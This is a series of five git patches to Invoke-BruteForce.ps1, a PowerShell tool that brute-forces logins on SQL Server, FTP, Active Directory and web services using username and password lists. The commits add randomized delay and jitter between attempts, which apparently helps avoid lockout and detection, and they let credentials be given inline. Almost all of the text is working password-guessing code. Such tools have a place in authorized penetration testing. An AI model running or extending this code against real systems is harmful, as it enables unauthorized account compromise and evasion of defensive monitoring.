From 98aae319528998ef997b901309ee02bd39d5ffea Mon Sep 17 00:00:00 2001 From: sammbertram Date: Wed, 25 Nov 2015 13:39:13 +0000 Subject: [PATCH 1/5] Update Invoke-BruteForce.ps1 --- Scan/Invoke-BruteForce.ps1 | 56 +++++++++++++++++++++++++++++++++----- 1 file changed, 49 insertions(+), 7 deletions(-) diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1 index 6334308..67d7901 100644 --- a/Scan/Invoke-BruteForce.ps1 +++ b/Scan/Invoke-BruteForce.ps1 @@ -1,4 +1,4 @@ - + function Invoke-BruteForce { <# @@ -23,6 +23,14 @@ Enter a Service from SQL, ActiveDirecotry, FTP and Web. Default service is set t .PARAMETER StopOnSuccess Use this switch to stop the brute forcing on the first success. +.PARAMETER Delay +Delay between brute-force attempts, defaults to 0. +(Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView) + +.PARAMETER Jitter +Jitter for the brute-force attempt delay, defaults to +/- 0.3 +(Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView) + .EXAMPLE PS > Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose Brute force a SQL Server SQLServ01 for users listed in users.txt and passwords in wordlist.txt @@ -50,27 +58,47 @@ Goude 2012, TreuSec [String] $ComputerName, - [Parameter(Position = 1, Mandatory = $false)] + [Parameter(Position = 1, Mandatory = $true)] + [Alias('Users')] [String] $UserList, - [Parameter(Position = 2, Mandatory = $false)] + [Parameter(Position = 2, Mandatory = $true)] + [Alias('Passwords')] [String] $PasswordList, - [Parameter(Position = 3, Mandatory = $false)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")] + [Parameter(Position = 3, Mandatory = $true)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")] [String] $Service = "SQL", [Parameter(Position = 4, Mandatory = $false)] [Switch] - $StopOnSuccess + $StopOnSuccess, + + [Parameter(Position = 5, Mandatory = $false)] + [Double] + $Jitter = .3, + + [Parameter(Position = 6, Mandatory = $false)] + [UInt32] + $Delay = 0 ) Process { - $usernames = Get-Content $UserList - $passwords = Get-Content $PasswordList + $usernames = Get-Content -ErrorAction SilentlyContinue -Path $UserList + $passwords = Get-Content -ErrorAction SilentlyContinue -Path $PasswordList + if (!$usernames) { + $usernames = $UserList + Write-Verbose "UserList file does not exist. Using UserList as usernames:" + Write-Verbose $usernames + } + if (!$passwords) { + $passwords = $PasswordList + Write-Verbose "PasswordList file does not exist. Using PasswordList as passwords:" + Write-Verbose $passwords + } #Brute force SQL Server $Connection = New-Object System.Data.SQLClient.SQLConnection function CheckForSQLSuccess @@ -100,6 +128,9 @@ Goude 2012, TreuSec Default { "Unknown" } } } + + # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) } if($service -eq "SQL") { @@ -163,6 +194,9 @@ Goude 2012, TreuSec $message = $error[0].ToString() $success = $false } + + # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) } } } @@ -208,9 +242,15 @@ Goude 2012, TreuSec $success = $false $message = "Password doesn't match" } + + # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) } } } + else { + Write $message + } } #Brute Force Web elseif ($service -eq "Web") @@ -252,6 +292,8 @@ Goude 2012, TreuSec $success = $false $message = "Password doesn't match" } + # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) } } } From 97718114c7f2eb28fded19430bcd6ca68fd1df29 Mon Sep 17 00:00:00 2001 From: sammbertram Date: Wed, 25 Nov 2015 13:49:41 +0000 Subject: [PATCH 2/5] Update Invoke-BruteForce.ps1 --- Scan/Invoke-BruteForce.ps1 | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1 index 67d7901..f3e5af9 100644 --- a/Scan/Invoke-BruteForce.ps1 +++ b/Scan/Invoke-BruteForce.ps1 @@ -77,7 +77,7 @@ Goude 2012, TreuSec $StopOnSuccess, [Parameter(Position = 5, Mandatory = $false)] - [Double] + [Double] $Jitter = .3, [Parameter(Position = 6, Mandatory = $false)] @@ -99,6 +99,9 @@ Goude 2012, TreuSec Write-Verbose "PasswordList file does not exist. Using PasswordList as passwords:" Write-Verbose $passwords } + + $RandNo = New-Object System.Random + #Brute force SQL Server $Connection = New-Object System.Data.SQLClient.SQLConnection function CheckForSQLSuccess From 225bd0f133c0143ab88556a0885e31b2a0acdae9 Mon Sep 17 00:00:00 2001 From: sammbertram Date: Wed, 25 Nov 2015 14:26:52 +0000 Subject: [PATCH 3/5] Update Invoke-BruteForce.ps1 --- Scan/Invoke-BruteForce.ps1 | 37 +++++++++++++++++++------------------ 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1 index f3e5af9..e8d9049 100644 --- a/Scan/Invoke-BruteForce.ps1 +++ b/Scan/Invoke-BruteForce.ps1 @@ -75,9 +75,9 @@ Goude 2012, TreuSec [Parameter(Position = 4, Mandatory = $false)] [Switch] $StopOnSuccess, - + [Parameter(Position = 5, Mandatory = $false)] - [Double] + [Double] $Jitter = .3, [Parameter(Position = 6, Mandatory = $false)] @@ -89,16 +89,17 @@ Goude 2012, TreuSec { $usernames = Get-Content -ErrorAction SilentlyContinue -Path $UserList $passwords = Get-Content -ErrorAction SilentlyContinue -Path $PasswordList - if (!$usernames) { - $usernames = $UserList - Write-Verbose "UserList file does not exist. Using UserList as usernames:" - Write-Verbose $usernames - } - if (!$passwords) { - $passwords = $PasswordList - Write-Verbose "PasswordList file does not exist. Using PasswordList as passwords:" - Write-Verbose $passwords - } + echo $usernames + if (!$usernames) { + $usernames = $UserList + Write-Verbose "UserList file does not exist. Using UserList as usernames:" + Write-Verbose $usernames + } + if (!$passwords) { + $passwords = $PasswordList + Write-Verbose "PasswordList file does not exist. Using PasswordList as passwords:" + Write-Verbose $passwords + } $RandNo = New-Object System.Random @@ -224,16 +225,16 @@ Goude 2012, TreuSec { :UsernameLoop foreach ($username in $usernames) { - foreach ($Password in $Passwords) + foreach ($password in $passwords) { Try { - Write-Verbose "Checking $userName : $password" + Write-Verbose "Checking $username : $password" $success = $principalContext.ValidateCredentials($username, $password) $message = "Password Match" if ($success -eq $true) { - Write-Output "Match found! $username : $Password" + Write-Output "Match found! $username : $password" if ($StopOnSuccess) { break UsernameLoop @@ -251,9 +252,9 @@ Goude 2012, TreuSec } } } - else { - Write $message - } + else { + Write $message + } } #Brute Force Web elseif ($service -eq "Web") From 5a115b29536c0e6eda0b845166a2a1fc79c94bac Mon Sep 17 00:00:00 2001 From: sammbertram Date: Wed, 25 Nov 2015 14:27:18 +0000 Subject: [PATCH 4/5] Update Invoke-BruteForce.ps1 --- Scan/Invoke-BruteForce.ps1 | 1 - 1 file changed, 1 deletion(-) diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1 index e8d9049..b8fc9a4 100644 --- a/Scan/Invoke-BruteForce.ps1 +++ b/Scan/Invoke-BruteForce.ps1 @@ -89,7 +89,6 @@ Goude 2012, TreuSec { $usernames = Get-Content -ErrorAction SilentlyContinue -Path $UserList $passwords = Get-Content -ErrorAction SilentlyContinue -Path $PasswordList - echo $usernames if (!$usernames) { $usernames = $UserList Write-Verbose "UserList file does not exist. Using UserList as usernames:" From daa5ae620c02822bd2a7c660bab22ff728f676e0 Mon Sep 17 00:00:00 2001 From: sammbertram Date: Wed, 25 Nov 2015 14:33:14 +0000 Subject: [PATCH 5/5] Update Invoke-BruteForce.ps1 --- Scan/Invoke-BruteForce.ps1 | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1 index b8fc9a4..bd15ba3 100644 --- a/Scan/Invoke-BruteForce.ps1 +++ b/Scan/Invoke-BruteForce.ps1 @@ -226,9 +226,10 @@ Goude 2012, TreuSec { foreach ($password in $passwords) { + $SleepSeconds = $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) Try { - Write-Verbose "Checking $username : $password" + Write-Verbose "Checking $username : $password (then sleeping for $SleepSeconds seconds)" $success = $principalContext.ValidateCredentials($username, $password) $message = "Password Match" if ($success -eq $true) @@ -247,7 +248,7 @@ Goude 2012, TreuSec } # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView - Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + Start-Sleep -Seconds $SleepSeconds } } }